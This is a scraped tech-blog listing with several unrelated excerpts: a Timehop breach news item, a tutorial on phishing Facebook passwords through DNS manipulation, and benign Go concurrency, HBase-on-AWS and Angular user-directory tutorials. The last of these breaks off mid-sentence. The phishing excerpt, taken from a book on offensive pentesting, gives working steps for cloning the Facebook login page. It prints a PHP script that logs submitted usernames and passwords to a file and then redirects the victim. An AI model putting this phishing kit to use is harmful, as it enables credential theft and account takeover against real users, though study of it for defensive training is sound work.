Timehop, the social media application that brings old posts into your feed, experienced a data breach on July 4. In a post published yesterday (July 8) the team explained that 'an access credential to our cloud computing enterprise was compromised'. Timehop believes 21 million users have been affected by the breach. However, it was keen to state that "we have no evidence that any accounts were accessed without authorization." Timehop has already acted to make necessary changes. Certain application features have been temporarily disabled, and users have been logged out of the app. Users will also have to re-authenticate Timehop on social media accounts. The team has deactivated the keys that allow the app to read and show users social media posts on their feeds. Timehop explained that the gap between the incident and the public statement was due to the need to "contact with a large number of partners." The investigation needed to be thorough in order for the response to be clear and coordinated. How did the Timehop data breach happen? For transparency, Timehop published a detailed technical report on how it believes the hack happened. An unauthorized user first accessed Timehop's cloud computing environment using an authorized users credentials. This user then conducted 'reconnaisance activities' once they had created a new administrative account. This user logged in to the account on numerous occasions after this in March and June 2018. It was only on July 4 that the attacker then attempted to access the production database. Timehop then states that they "conducted a specific action that triggered an alarm" which allowed engineers to act quickly to stop the attack from continuing. Once this was done, there was a detailed and thorough investigation. This included analyzing the attacker's activity on the network and auditing all security permissions and processes. A measured response to a potential crisis It's worth noting just how methodical Timehop's response has been. Yes, there will be question marks over the delay, but it does make a lot of sense. Timehop revealed that the news was provided to some journalists "under embargo in order to determine the most effective ways to communicate what had happened while neither causing panic nor resorting to bland euphemism." The incident demonstrates that effective cybersecurity is as much about a robust communication strategy as it is about secure software.  Read next: Did Facebook just have another security scare? What security and systems specialists are planning to learn in 2018
Read more
  • 0
  • 0
  • 15994

article-image-facebook-password-phishing-dns-manipulation-tutorial
Savia Lobo
09 Jul 2018
6 min read
Save for later

Phish for Facebook passwords with DNS manipulation [Tutorial]

Savia Lobo
09 Jul 2018
6 min read
Password Phishing can result in huge loss of identity and user's confidential details. This could result in financial losses for users and can also prevent them from accessing their own accounts. In this article,  we will see how an attacker can take advantage of manipulating the DNS record for Facebook, redirect traffic to the phishing page, and grab the account password. This article is an excerpt taken from 'Python For Offensive PenTest' written by Hussam Khrais.  Facebook password phishing Here, we will see how an attacker can take advantage of manipulating the DNS record for Facebook, redirect traffic to the phishing page, and grab the account password. First, we need to set up a phishing page. You need not be an expert in web programming. You can easily Google the steps for preparing a phishing account. To create a phishing page, first open your browser and navigate to the Facebook login page. Then, on the browser menu, click on File and then on Save page as.... Then, make sure that you choose a complete page from the drop-down menu. The output should be an .html file. Now let's extract some data here. Open the Phishing folder from the code files provided with this book. Rename the Facebook HTML page index.html. Inside this HTML, we have to change the login form. If you search for action=, you will see it. Here, we change the login form to redirect the request into a custom PHP page called login.php. Also, we have to change the request method to GET instead of POST. You will see that I have added a login.php page in the same Phishing directory. If you open the file, you will find the following script: <?php header("Location: http://www.facebook.com/home.php? "); $handle = fopen("passwords.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "rn"); } fwrite($handle, "rn"); fclose($handle); exit; ?> As soon as our target clicks on the Log In button, we will send the data as a GET request to this login.php and we will store the submitted data in our passwords.txt file; then, we will close it. Next, we will create the passwords.txt file, where the target credentials will be stored. Now, we will copy all of these files into varwww and start the Apache services. If we open the index.html page locally, we will see that this is the phishing page that the target will see. Let's recap really quickly what will happen when the target clicks on the Log In button? As soon as our target clicks on the Log In button, the target's credentials will be sent as GET requests to login.php. Remember that this will happen because we have modified the action parameter to send the credentials to login.php. After that, the login.php will eventually store the data into the passwords.txt file. Now, before we start the Apache services, let me make sure that we get an IP address. Enter the following command: ifconfig eth0 You can see that we are running on 10.10.10.100 and we will also start the Apache service using: service apache2 start Let's verify that we are listening on port 80, and the service that is listening is Apache: netstat -antp | grep "80" Now, let's jump to the target side for a second. In our previous section, we have used google.jo in our script. Here, we have already modified our previous script to redirect the Facebook traffic to our attacker machine. So, all our target has to do is double-click on the EXE file. Now, to verify: Let us start Wireshark and then start the capture. We will filter on the attacker IP, which is 10.10.10.100: Open the browser and navigate to https://www.facebook.com/: Once we do this, we're taken to the phishing page instead. Here, you will see the destination IP, which is the Kali IP address. So, on the target side, once we are viewing or hitting https://www.facebook.com/, we are basically viewing index.html, which is set up on the Kali machine. Once the victim clicks on the login page, we will send the data as a GET request to login.php, and we will store it into passwords.txt, which is currently empty. Now, log into your Facebook account using your username and password. and jump on the Kali side and see if we get anything on the passwords.txt file. You can see it is still empty. This is because, by default, we have no permission to write data. Now, to fix this, we will give all files full privilege, that is, to read, write, and execute: chmod -R 777 /var/www/ Note that we made this, since we are running in a VirtualBox environment. If you have a web server exposed to the public, it's bad practice to give full permission to all of your files due to privilege escalation attacks, as an attacker may upload a malicious file or manipulate the files and then browse to the file location to execute a command on his own. Now, after giving the permission, we will stop and start the Apache server just in case: service apache2 stop service apache2 start After doing this modification, go to the target machine and try to log into Facebook one more time. Then, go to Kali and click on passwords.txt. You will see the submitted data from the target side, and we can see the username and the password. In the end, a good sign for a phishing activity is missing the https sign. We performed the password phishing process using Python. If you have enjoyed reading this excerpt, do check out 'Python For Offensive PenTest' to learn how to protect yourself and secure your account from these attacks and code your own scripts and master ethical hacking from scratch. Phish for passwords using DNS poisoning [Tutorial] How to secure a private cloud using IAM How cybersecurity can help us secure cyberspace
Read more
  • 0
  • 0
  • 46389
article-image-concurrency-and-parallelism-in-golang-tutorial
Natasha Mathur
06 Jul 2018
11 min read
Save for later

How Concurrency and Parallelism works in Golang [Tutorial]

Natasha Mathur
06 Jul 2018
11 min read
Computer and software programs are useful because they do a lot of laborious work very fast and can also do multiple things at once. We want our programs to be able to do multiple things simultaneously, and the success of a programming language can depend on how easy it is to write and understand multitasking programs. Concurrency and parallelism are two terms that are bound to come across often when looking into multitasking and are often used interchangeably. However, they mean two distinctly different things. In this article, we will look at how concurrency and parallelism work in Go using simple examples for better understanding. Let's get started! This article is an excerpt from a book 'Distributed Computing with Go' written by V.N. Nikhil Anurag. The standard definitions given on the Go blog are as follows: Concurrency: Concurrency is about dealing with lots of things at once. This means that we manage to get multiple things done at once in a given period of time. However, we will only be doing a single thing at a time. This tends to happen in programs where one task is waiting and the program decides to run another task in the idle time. In the following diagram, this is denoted by running the yellow task in idle periods of the blue task. Parallelism: Parallelism is about doing lots of things at once. This means that even if we have two tasks, they are continuously working without any breaks in between them. In the diagram, this is shown by the fact that the green task is running independently and is not influenced by the red task in any manner: It is important to understand the difference between these two terms. Let's look at a few concrete examples to further elaborate upon the difference between the two. Concurrency Let's look at the concept of concurrency using a simple example of a few daily routine tasks and the way we can perform them. Imagine you start your day and need to get six things done: Make hotel reservation Book flight tickets Order a dress Pay credit card bills Write an email Listen to an audiobook The order in which they are completed doesn't matter, and for some of the tasks, such as  writing an email or listening to an audiobook, you need not complete them in a single sitting. Here is one possible way to complete the tasks: Order a dress. Write one-third of the email. Make hotel reservation. Listen to 10 minutes of audiobook. Pay credit card bills. Write another one-third of the email. Book flight tickets. Listen to another 20 minutes of audiobook. Complete writing the email. Continue listening to audiobook until you fall asleep. In programming terms, we have executed the above tasks concurrently. We had a complete day and we chose particular tasks from our list of tasks and started to work on them. For certain tasks, we even decided to break them up into pieces and work on the pieces between other tasks. We will eventually write a program which does all of the preceding steps concurrently, but let's take it one step at a time. Let's start by building a program that executes the tasks sequentially, and then modify it progressively until it is purely concurrent code and uses goroutines. The progression of the program will be in three steps: Serial task execution. Serial task execution with goroutines. Concurrent task execution. Code overview The code will consist of a set of functions that print out their assigned tasks as completed. In the cases of writing an email or listening to an audiobook, we further divide the tasks into more functions. This can be seen as follows: writeMail, continueWritingMail1, continueWritingMail2 listenToAudioBook, continueListeningToAudioBook Serial task execution Let's first implement a program that will execute all the tasks in a linear manner. Based on the code overview we discussed previously, the following code should be straightforward: package main import ( "fmt" ) // Simple individual tasks func makeHotelReservation() { fmt.Println("Done making hotel reservation.") } func bookFlightTickets() { fmt.Println("Done booking flight tickets.") } func orderADress() { fmt.Println("Done ordering a dress.") } func payCreditCardBills() { fmt.Println("Done paying Credit Card bills.") } // Tasks that will be executed in parts // Writing Mail func writeAMail() { fmt.Println("Wrote 1/3rd of the mail.") continueWritingMail1() } func continueWritingMail1() { fmt.Println("Wrote 2/3rds of the mail.") continueWritingMail2() } func continueWritingMail2() { fmt.Println("Done writing the mail.") } // Listening to Audio Book func listenToAudioBook() { fmt.Println("Listened to 10 minutes of audio book.") continueListeningToAudioBook() } func continueListeningToAudioBook() { fmt.Println("Done listening to audio book.") } // All the tasks we want to complete in the day. // Note that we do not include the sub tasks here. var listOfTasks = []func(){ makeHotelReservation, bookFlightTickets, orderADress, payCreditCardBills, writeAMail, listenToAudioBook, } func main() { for _, task := range listOfTasks { task() } } We take each of the main tasks and start executing them in simple sequential order. Executing the preceding code should produce unsurprising output, as shown here: Done making hotel reservation. Done booking flight tickets. Done ordering a dress. Done paying Credit Card bills. Wrote 1/3rd of the mail. Wrote 2/3rds of the mail. Done writing the mail. Listened to 10 minutes of audio book. Done listening to audio book. Serial task execution with goroutines We took a list of tasks and wrote a program to execute them in a linear and sequential manner. However, we want to execute the tasks concurrently! Let's start by first introducing goroutines for the split tasks and see how it goes. We will only show the code snippet where the code actually changed here: /******************************************************************** We start by making Writing Mail & Listening Audio Book concurrent. *********************************************************************/ // Tasks that will be executed in parts // Writing Mail func writeAMail() { fmt.Println("Wrote 1/3rd of the mail.") go continueWritingMail1() // Notice the addition of 'go' keyword. } func continueWritingMail1() { fmt.Println("Wrote 2/3rds of the mail.") go continueWritingMail2() // Notice the addition of 'go' keyword. } func continueWritingMail2() { fmt.Println("Done writing the mail.") } // Listening to Audio Book func listenToAudioBook() { fmt.Println("Listened to 10 minutes of audio book.") go continueListeningToAudioBook() // Notice the addition of 'go' keyword. } func continueListeningToAudioBook() { fmt.Println("Done listening to audio book.") } The following is a possible output: Done making hotel reservation. Done booking flight tickets. Done ordering a dress. Done paying Credit Card bills. Wrote 1/3rd of the mail. Listened to 10 minutes of audio book. Whoops! That's not what we were expecting. The output from the continueWritingMail1, continueWritingMail2, and continueListeningToAudioBook functions is missing; the reason being that we are using goroutines. Since goroutines are not waited upon, the code in the main function continues executing and once the control flow reaches the end of the main function, the program ends. What we would really like to do is to wait in the main function until all the goroutines have finished executing. There are two ways we can do this—using channels or using WaitGroup.  We'll use WaitGroup now. In order to use WaitGroup, we have to keep the following in mind: Use WaitGroup.Add(int) to keep count of how many goroutines we will be running as part of our logic. Use WaitGroup.Done() to signal that a goroutine is done with its task. Use WaitGroup.Wait() to wait until all goroutines are done. Pass WaitGroup instance to the goroutines so they can call the Done() method. Based on these points, we should be able to modify the source code to use WaitGroup. The following is the updated code: package main import ( "fmt" "sync" ) // Simple individual tasks func makeHotelReservation(wg *sync.WaitGroup) { fmt.Println("Done making hotel reservation.") wg.Done() } func bookFlightTickets(wg *sync.WaitGroup) { fmt.Println("Done booking flight tickets.") wg.Done() } func orderADress(wg *sync.WaitGroup) { fmt.Println("Done ordering a dress.") wg.Done() } func payCreditCardBills(wg *sync.WaitGroup) { fmt.Println("Done paying Credit Card bills.") wg.Done() } // Tasks that will be executed in parts // Writing Mail func writeAMail(wg *sync.WaitGroup) { fmt.Println("Wrote 1/3rd of the mail.") go continueWritingMail1(wg) } func continueWritingMail1(wg *sync.WaitGroup) { fmt.Println("Wrote 2/3rds of the mail.") go continueWritingMail2(wg) } func continueWritingMail2(wg *sync.WaitGroup) { fmt.Println("Done writing the mail.") wg.Done() } // Listening to Audio Book func listenToAudioBook(wg *sync.WaitGroup) { fmt.Println("Listened to 10 minutes of audio book.") go continueListeningToAudioBook(wg) } func continueListeningToAudioBook(wg *sync.WaitGroup) { fmt.Println("Done listening to audio book.") wg.Done() } // All the tasks we want to complete in the day. // Note that we do not include the sub tasks here. var listOfTasks = []func(*sync.WaitGroup){ makeHotelReservation, bookFlightTickets, orderADress, payCreditCardBills, writeAMail, listenToAudioBook, } func main() { var waitGroup sync.WaitGroup // Set number of effective goroutines we want to wait upon waitGroup.Add(len(listOfTasks)) for _, task := range listOfTasks{ // Pass reference to WaitGroup instance // Each of the tasks should call on WaitGroup.Done() task(&waitGroup) } // Wait until all goroutines have completed execution. waitGroup.Wait() } Here is one possible output order; notice how continueWritingMail1 and continueWritingMail2 were executed at the end after listenToAudioBook and continueListeningToAudioBook: Done making hotel reservation. Done booking flight tickets. Done ordering a dress. Done paying Credit Card bills. Wrote 1/3rd of the mail. Listened to 10 minutes of audio book. Done listening to audio book. Wrote 2/3rds of the mail. Done writing the mail. Concurrent task execution In the final output of the previous part, we can see that all the tasks in listOfTasks are being executed in serial order, and the last step for maximum concurrency would be to let the order be determined by Go runtime instead of the order in listOfTasks. This might sound like a laborious task, but in reality this is quite simple to achieve. All we need to do is add the go keyword in front of task(&waitGroup): func main() { var waitGroup sync.WaitGroup // Set number of effective goroutines we want to wait upon waitGroup.Add(len(listOfTasks)) for _, task := range listOfTasks { // Pass reference to WaitGroup instance // Each of the tasks should call on WaitGroup.Done() go task(&waitGroup) // Achieving maximum concurrency } // Wait until all goroutines have completed execution. waitGroup.Wait() Following is a possible output: Listened to 10 minutes of audio book. Done listening to audio book. Done booking flight tickets. Done ordering a dress. Done paying Credit Card bills. Wrote 1/3rd of the mail. Wrote 2/3rds of the mail. Done writing the mail. Done making hotel reservation. If we look at this possible output, the tasks were executed in the following order: Listen to audiobook. Book flight tickets. Order a dress. Pay credit card bills. Write an email. Make hotel reservations. Now that we have a good idea on what concurrency is and how to write concurrent code using goroutines and WaitGroup, let's dive into parallelism. Parallelism Imagine that you have to write a few emails. They are going to be long and laborious, and the best way to keep yourself entertained is to listen to music while writing them, that is, listening to music "in parallel" to writing the emails. If we wanted to write a program that simulates this scenario, the following is one possible implementation: package main import ( "fmt" "sync" "time" ) func printTime(msg string) { fmt.Println(msg, time.Now().Format("15:04:05")) } // Task that will be done over time func writeMail1(wg *sync.WaitGroup) { printTime("Done writing mail #1.") wg.Done() } func writeMail2(wg *sync.WaitGroup) { printTime("Done writing mail #2.") wg.Done() } func writeMail3(wg *sync.WaitGroup) { printTime("Done writing mail #3.") wg.Done() } // Task done in parallel func listenForever() { for { printTime("Listening...") } } func main() { var waitGroup sync.WaitGroup waitGroup.Add(3) go listenForever() // Give some time for listenForever to start time.Sleep(time.Nanosecond * 10) // Let's start writing the mails go writeMail1(&waitGroup) go writeMail2(&waitGroup) go writeMail3(&waitGroup) waitGroup.Wait() } The output of the program might be as follows: Done writing mail #3. 19:32:57 Listening... 19:32:57 Listening... 19:32:57 Done writing mail #1. 19:32:57 Listening... 19:32:57 Listening... 19:32:57 Done writing mail #2. 19:32:57 The numbers represent the time in terms of Hour:Minutes:Seconds and, as can be seen, they are being executed in parallel. You might have noticed that the code for parallelism looks almost identical to the code for the final concurrency example. However, in the function listenForever, we are printing Listening... in an infinite loop. If the preceding example was written without goroutines, the output would keep printing Listening... and never reach the writeMail function calls. Goroutines are concurrent and, to an extent, parallel; however, we should think of them as being concurrent. The order of execution of goroutines is not predictable and we should not rely on them to be executed in any particular order. We should also take care to handle errors and panics in our goroutines because even though they are being executed in parallel, a panic in one goroutine will crash the complete program. Finally, goroutines can block on system calls, however, this will not block the execution of the program nor slow down the performance of the overall program. We looked at how goroutine can be used to run concurrent programs and also learned how parallelism works in Go. If you found this post useful, do check out the book 'Distributed Computing with Go' to learn more about Goroutines, channels and messages, and other concepts in Go. Golang Decorators: Logging & Time Profiling Essential Tools for Go Programming Why is Go the go-to language for cloud-native development? – An interview with Mina Andrawos
Read more
  • 0
  • 0
  • 67251

article-image-optimize-hbase-for-the-cloud-tutorial
Natasha Mathur
06 Jul 2018
8 min read
Save for later

How to optimize Hbase for the Cloud [Tutorial]

Natasha Mathur
06 Jul 2018
8 min read
Hadoop/Hbase was designed to crunch a huge amount of data in a batch mode and provide meaningful results to this data. This article is an excerpt taken from the book ‘HBase High Performance Cookbook’ written by Ruchir Choudhry. This book provides a solid understanding of the HBase basics. However, as the technology evolved over the years, the original architecture was fine tuned to move from the world of big-iron to the choice of cloud Infrastructure: It provides optimum pricing for the provisioning of new hardware, storage, and monitoring the infrastructure. One-click setup of additional nodes and storage. Elastic load-balancing to different clusters within the Hbase ecosystem. Ability to resize the cluster on-demand. Share capacity with different time-zones, for example, doing batch jobs in different data centers to and real-time analytics near to the customer. Easy integration with other Cloud-based services. HBase on Amazon EMR provides the ability to back up your HBase data directly to Amazon Simple Storage Service (Amazon S3). You can also restore from a previously created backup when launching an HBase cluster. Configuring Hbase for the Cloud Before we start, let's take a quick look at the supported versions and the prerequisites you need to move ahead. The list of supported versions is as below: Hbase Version - 0.94.18 & 0.94 AMI Versions - 3.1.0 and later & 3.0-3.04 AWS CLI configuration parameters -  -ami-version 3.1 -ami-version 3.2 -ami-version 3.3 --applications Name=Hbase --ami-version 3.0 --application name=Hbase --ami-version 2.2 or later --applications Name=HBase Hbase Version details -  Bug fixes Now let's look at the prerequisites: At least two instances (Optional): The cluster's master node runs the HBase master server and Zookeeper, and slave nodes run the HBase region servers. For optimum performance and production systems, HBase clusters should run on at least two EC2 instances, but you can run HBase on a single node for evaluation Purposes. Long-running clusters: HBase only runs on long-running clusters. By default, the CLI and Amazon EMR console create long-running clusters. An Amazon EC2 key pair set (Recommended): To use the Secure Shell (SSH) network protocol to connect with the master node and run HBase shell commands, you must use an Amazon EC2 key pair when you create the cluster. The correct AMI and Hadoop versions: HBase clusters are currently supported only on Hadoop 20.205 or later. The AWS CLI: This is needed to interact with Hbase using the command-line options. Use of Ganglia tool: For monitoring, it's advisable to use the Ganglia tool; this provides all information related to performance and can be installed as a client lib when we create the cluster. The logs for Hbase: They are available on the master node; it's a standard practice in a production environment to copy these logs to the Amazon S3 cluster. How to do it Open a browser and copy the following URL: (https://console.aws.amazon.com/elasticmapreduce/); if you don't have an Amazon AWS account, then you have to create it. Then choose Create cluster as shown in the following: Provide the cluster name; you must select Launch mode as cluster Let's proceed to the software configuration section. There are two options: Amazon template or MapR template. We are going to use Amazon template. It will load the default applications, which includes Hbase. Security is key when you are using ssh to the login to the cluster. Let's create a security key, by selecting NETWORK & SECURITY on the left section of the panel (as shown in the following). We have created as Hbase03: Once you create this security key, it will ask for a download of a .pem file , which is known as hbase03.pem. Copy this file to the user location and change the access to: chmod 400 <hbase03.pem> This will ensure the write level of access is there on the file and is not accessible Two-way. Now select this pair from the drop-down box in the EC2 Key pair; this will allow you to register the instance to the key while provisioning the instance. You can do this later too, but I had some challenges in doing this so it is always better to provision the instance with the property Now, you are ready to provision the EMR cluster. Go ahead and provision the cluster. It will take around 10 to 20 mins to have a cluster fully accessible and in a running Condition. Verify it by observing the console: How it works When you select the cluster name, it maps to your associate account internally and keeps the mapping the cluster is alive (or net destroyed). When you select an installation using the setting it loads all the respective JAR files, which allows it to perform in a fully distributed environment. You can select the EMR or MapR stable release, which allows us to load the compatible library, and hence focus on the solution rather than troubleshooting integration issues within the Hadoop/Hbase farms. Internally, all the slaves connects to the master, and hence, we considered an extra-large VM. Connecting to an Hbase cluster using the command line How to do it You can alternatively SSH to the node and see the details as follows: Once you have connected to the cluster, you can perform all the tasks which you can perform on local clusters. The preceding screenshot gives the details of the components we selected while installing the cluster. Let's connect to the Hbase shell to make sure all the components are connecting internally and we are able to create a sample table. How it works The communication between your machine and the Hbase cluster works by passing a key every time a command is executed; this allows the communication to be private. The shell becomes the remote shell that connects to the Hbase master via a private connection. All the base shell commands such as put, create, and scan get all the known Hbase commands. Backing up and restoring Hbase Amazon Elastic MapReduce provides multiple ways to back up and restore Hbase data to S3 cloud. It also allows us to do an incremental backup; during the backup process Hbase continues to execute the write commands, helping us to keep working while the backup process continues. There is a risk of having an inconsistency in the data. If consistency is of prime importance, then the write needs to be stopped during the initial backup process, synchronized across nodes. This can be achieved by passing the–consistent parameter when requesting a backup. When you back up HBase data, you should specify a different backup directory for each Cluster. An easy way to do this is to use the cluster identifier as part of the path specified for the backup directory. For example, s3://mybucket/backups/j-3AEXXXXXX16F2. This ensures that any future incremental backups reference the correct HBase cluster. How to do it When you are ready to delete old backup files that are no longer needed, we recommend that you first do a full backup of your HBase data. This ensures that all data is preserved and provides a baseline for future incremental backups. Once the full backup is done, you can navigate to the backup location and manually delete the old backup files: While creating a cluster, add an additional step scheduling regular backups, as shown in the following. You have to specify the location of the backup to which a backup file with the data will be kept, based on the backup frequency selected. For highly valuable data, you can have a backup on an hourly basis. For less sensitive data, it can be planned daily: It's a good practice to backup to a separate location in Amazon S3 to ensure that incremental backups are calculated correctly. It's important to specify the exact time from when the backup will be started, the time zone specified is UTC for our cluster. We can proceed with creating the cluster as planned; it will create a backup of the data to the location specified. You have to provide the exact location of the backup file and restore it. The version that is backed up needs to be specified and saved, which will allow the data to be restored. How it works During the backup process, Hbase continues to execute write commands; this ensures the cluster remains available throughout the backup process. Internally, the operation is done in parallel, thus there is a chance of it being inconsistent. If the use case requires consistency, then we have to pause the write to Hbase. This can be achieved by passing the consistent parameter while requesting a backup. This internally queues the writes and executes them as soon as the synchronization complete. We learned about configuration of Hbase for the cloud, connected Hbase cluster using the command line, and performed backup & restore of Hbase. If you found this post useful, do check out the book ‘HBase High Perforamnce Cookbook’ to learn other concepts such as terminating an HBase Cluster, accessing HBase data with hive, viewing HBase log files, etc. Understanding the HBase Ecosystem Configuring HBase 5 Mistake Developers make when working with HBase    
Read more
  • 0
  • 0
  • 15197

article-image-build-user-directory-app-with-angular-tutorial
Sugandha Lahoti
05 Jul 2018
12 min read
Save for later

Build user directory app with Angular [Tutorial]

Sugandha Lahoti
05 Jul 2018
12 min read
In this article, we will learn how to build a user directory with Angular. The app will have a REST API which will be created during the course of this example. In this simple example, we'll be creating a users app which will be a table with a list of users together with their email addresses and phone numbers. Each user in the table will have an active state whose value is a boolean. We will be able to change the active state of a particular user from false to true and vice versa. The app will give us the ability to add new users and also delete users from the table. diskDB will be used as the database for this example. We will have an Angular service which contains methods that will be responsible for communicating with the REST end points. These methods will be responsible for making get, post, put, and delete requests to the REST API. The first method in the service will be responsible for making a get request to the API. This will enable us to retrieve all the users from the back end. Next, we will have another method that makes a post request to the API. This will enable us to add new users to the array of existing users. The next method we shall have will be responsible for making a delete request to the API in order to enable the deletion of a user. Finally, we shall have a method that makes a put request to the API. This will be the method that gives us the ability to edit/modify the state of a user. In order to make these requests to the REST API, we will have to make use of the HttpModule. The aim of this section is to solidify your knowledge of HTTP. As a JavaScript and, in fact, an Angular developer, you are bound to make interactions with APIs and web servers almost all the time. So much data used by developers today is in form of APIs and in order to make interactions with these APIs, we need to constantly make use of HTTP requests. As a matter of fact, HTTP is the foundation of data communication for the web. This article is an excerpt from the book, TypeScript 2.x for Angular Developers, written by Chris Nwamba. Create a new Angular app To start a new Angular app, run the following command: ng new user This creates the Angular 2 user app. Install the following dependencies: Express Body-parser Cors npm install express body-parser cors --save Create a Node server Create a file called server.js at the root of the project directory. This will be our node server. Populate server.js with the following block of code: // Require dependencies const express = require('express'); const path = require('path'); const http = require('http'); const cors = require('cors'); const bodyParser = require('body-parser'); // Get our API routes const route = require('./route'); const app = express(); app.use(bodyParser.json()); app.use(bodyParser.urlencoded({ extended: false })); // Use CORS app.use(cors()); // Set our api routes app.use('/api', route); /** * Get port from environment. */ const port = process.env.PORT || '3000'; /** * Create HTTP server. */ const server = http.createServer(app); //Listen on provided port app.listen(port); console.log('server is listening'); What's going on here is pretty simple: We required and made use of the dependencies We defined and set the API routes We set a port for our server to listen to The API routes are being required from ./route, but this path does not exist yet. Let's quickly create it. At the root of the project directory, create a file called route.js. This is where the API routes will be made. We need to have a form of a database from where we can fetch, post, delete, and modify data. Just as in the previous example, we will make use of diskdb. The route will pretty much have the same pattern as in the first example. Install diskDB Run the following in the project folder to install diskdb: npm install diskdb Create a users.json file at the root of the project directory to serve as our database collection where we have our users' details. Populate users.json with the following: [{"name": "Marcel", "email": "test1@gmail.com", "phone_number":"08012345", "isOnline":false}] Now, update route.js. route.js const express = require('express'); const router = express.Router(); const db = require('diskdb'); db.connect(__dirname, ['users']); //save router.post('/users', function(req, res, next) { var user = req.body; if (!user.name && !(user.email + '') && !(user.phone_number + '') && !(user.isActive + '')) { res.status(400); res.json({ error: 'error' }); } else { console.log('ds'); db.users.save(todo); res.json(todo); } }); //get router.get('/users', function(req, res, next) { var foundUsers = db.users.find(); console.log(foundUsers); res.json(foundUsers); foundUsers = db.users.find(); console.log(foundUsers); }); //updateUsers router.put('/user/:id', function(req, res, next) { var updUser = req.body; console.log(updUser, req.params.id) db.users.update({_id: req.params.id}, updUser); res.json({ msg: req.params.id + ' updated' }); }); //delete router.delete('/user/:id', function(req, res, next) { console.log(req.params); db.users.remove({ _id: req.params.id }); res.json({ msg: req.params.id + ' deleted' }); }); module.exports = router; We've created a REST API with the API routes, using diskDB as the database. Start the server using the following command: node server.js The server is running and it is listening to the assigned port. Now, open up the browser and go to http://localhost:3000/api/users. Here, we can see the data that we imputed to the users.json file. This shows that our routes are working and we are getting data from the database. Create a new component Run the following command to create a new component: ng g component user This creates user.component.ts, user.component.html, user.component.css and user.component.spec.ts files. User.component.spec.ts is used for testing, therefore we will not be making use of it in this chapter. The newly created component is automatically imported into app.module.ts. We have to tell the root component about the user component. We'll do this by importing the selector from user.component.ts into the root template component (app.component.html): <div style="text-align:center"> <app-user></app-user> </div> Create a service The next step is to create a service that interacts with the API that we created earlier: ng generate service user This creates a user service called the user.service.ts. Next, import UserService class into app.module.ts and include it to the providers array: Import rxjs/add/operator/map in the imports section. import { Injectable } from '@angular/core'; import { Http, Headers } from '@angular/http'; import 'rxjs/add/operator/map'; Within the UserService class, define a constructor and pass in the angular 2 HTTP service. import { Injectable } from '@angular/core'; import { Http, Headers } from '@angular/http'; import 'rxjs/add/operator/map'; @Injectable() export class UserService { constructor(private http: Http) {} } Within the service class, write a method that makes a get request to fetch all users and their details from the API: getUser() { return this.http .get('http://localhost:3000/api/users') .map(res => res.json()); } Write the method that makes a post request and creates a new todo: addUser(newUser) { var headers = new Headers(); headers.append('Content-Type', 'application/json'); return this.http .post('http://localhost:3000/api/user', JSON.stringify(newUser), { headers: headers }) .map(res => res.json()); } Write another method that makes a delete request. This will enable us to delete a user from the collection of users: deleteUser(id) { return this.http .delete('http://localhost:3000/api/user/' + id) .map(res => res.json()); } Finally, write a method that makes a put request. This method will enable us to modify the state of a user: updateUser(user) { var headers = new Headers(); headers.append('Content-Type', 'application/json'); return this.http .put('http://localhost:3000/api/user/' + user._id, JSON.stringify(user), { headers: headers }) .map(res => res.json()); } Update app.module.ts to import HttpModule and FormsModule and include them to the imports array: import { HttpModule } from '@angular/http'; import { FormsModule } from '@angular/forms'; ..... imports: [ ..... HttpModule, FormsModule ] The next thing to do is to teach the user component to use the service: Import UserService in user.component.ts. import {UserService} from '../user.service'; Next, include the service class in the user component constructor. constructor(private userService: UserService) { }. Just below the exported UserComponent class, add the following properties and define their data types: users: any = []; user: any; name: any; email: any; phone_number: any; isOnline: boolean; Now, we can make use of the methods from the user service in the user component. Updating user.component.ts Within the ngOnInit method, make use of the user service to get all users from the API: ngOnInit() { this.userService.getUser().subscribe(users => { console.log(users); this.users = users; }); } Below the ngOnInit method, write a method that makes use of the post method in the user service to add new users: addUser(event) { event.preventDefault(); var newUser = { name: this.name, email: this.email, phone_number: this.phone_number, isOnline: false }; this.userService.addUser(newUser).subscribe(user => { this.users.push(user); this.name = ''; this.email = ''; this.phone_number = ''; }); } Let's make use of the delete method from the user service to enable us to delete users: deleteUser(id) { var users = this.users; this.userService.deleteUser(id).subscribe(data => { console.log(id); const index = this.users.findIndex(user => user._id == id); users.splice(index, 1) }); } Finally, we'll make use of user service to make put requests to the API: updateUser(user) { var _user = { _id: user._id, name: user.name, email: user.email, phone_number: user.phone_number, isActive: !user.isActive }; this.userService.updateUser(_user).subscribe(data => { const index = this.users.findIndex(user => user._id == _user._id) this.users[index] = _user; }); } We have all our communication with the API, service, and component. We have to update user.component.html in order to illustrate all that we have done in the browser. We'll be making use of bootstrap for styling. So, we have to import the bootstrap CDN in index.html: <!doctype html> <html lang="en"> <head> //bootstrap CDN <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta/css/bootstrap.min.css" integrity="sha384-/Y6pD6FV/Vv2HJnA6t+vslU6fwYXjCFtcEpHbNJ0lyAFsXTsjBbfaDjzALeQsN6M" crossorigin="anonymous"> <meta charset="utf-8"> <title>User</title> <base href="/"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" type="image/x-icon" href="favicon.ico"> </head> <body> <app-root></app-root> </body> </html> Updating user.component.html Here is the component template for the user component: <form class="form-inline" (submit) = "addUser($event)"> <div class="form-row"> <div class="col"> <input type="text" class="form-control" [(ngModel)] ="name" name="name"> </div> <div class="col"> <input type="text" class="form-control" [(ngModel)] ="email" name="email"> </div> <div class="col"> <input type="text" class="form-control" [(ngModel)] ="phone_number" name="phone_number"> </div> </div> <br> <button class="btn btn-primary" type="submit" (click) = "addUser($event)"><h4>Add User</h4></button> </form> <table class="table table-striped" > <thead> <tr> <th>Name</th> <th>Email</th> <th>Phone_Number</th> <th>Active</th> </tr> </thead> <tbody *ngFor="let user of users"> <tr> <td>{{user.name}}</td> <td>{{user.email}}</td> <td>{{user.phone_number}}</td> <td>{{user.isActive}}</td> <td><input type="submit" class="btn btn-warning" value="Update Status" (click)="updateUser(user)" [ngStyle]="{ 'text-decoration-color:': user.isActive ? 'blue' : ''}"></td> <td><button (click) ="deleteUser(user._id)" class="btn btn-danger">Delete</button></td> </tr> </tbody> </table> A lot is going on in the preceding code, let's drill down into the code block: We have a form which takes in three inputs and a submit button which triggers the addUser() method when clicked There is a delete button which triggers the delete method when it is clicked There is also an update status input element that triggers the updateUser() method when clicked We created a table in which our users' details will be displayed utilizing Angular's *ngFor directive and Angular's interpolation binding syntax, {{}} Some extra styling will be added to the project. Go to user.component.css and add the 